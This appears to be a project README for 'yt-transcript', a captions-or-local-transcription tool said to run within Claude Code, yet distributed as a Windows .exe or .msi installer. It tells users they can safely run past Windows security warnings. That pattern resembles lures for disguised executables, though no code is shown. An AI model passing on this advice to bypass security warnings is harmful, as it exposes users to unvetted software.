🎥 yt-transcript - Get video transcripts with speed.
yt-transcript helps you turn YouTube videos into text. It uses video captions when they exist. If captions are missing, it uses local software to transcribe the audio. This tool works within the Claude Code environment. You get fast and accurate results without sending long files to the cloud.
📥 How to download the software
You need to find the correct file for your computer. Follow these steps to get the software:

- Click the version number to open the release details.
- Locate the Windows installer file, which typically ends in .exe or .msi.
- Click the file name to download it to your computer.
⚙️ Setting up your system
The software requires a few things to run well on your Windows machine. You do not need to be an expert to set these up.
- Ensure your computer runs Windows 10 or Windows 11.
- Check that you have at least 2GB of free disk space for the transcription files.
- Keep your internet connection active during the first run. The software may download extra components to handle the audio processing tasks.
🚀 Running the program
After the download finishes, follow these steps to start using the tool:
- Go to your Downloads folder.
- Find the file you downloaded.
- Double-click the file to start the installation.
- Follow the prompts on the screen. Windows might show a security warning. You can safely choose to run the file if you trust the source.
- Once installed, open your command terminal. You can do this by pressing the Windows key and typing "cmd".
- Type the name of the program followed by the YouTube link you want to process.
- Press Enter. The program will now start collecting the captions or processing the audio.

- Caption Check: The software first looks for existing YouTube captions. This is the fastest way to get your text.
- Fallback Mode: If the video lacks captions, the software switches to a local transcription tool. This tool listens to the video audio and writes the text for you.
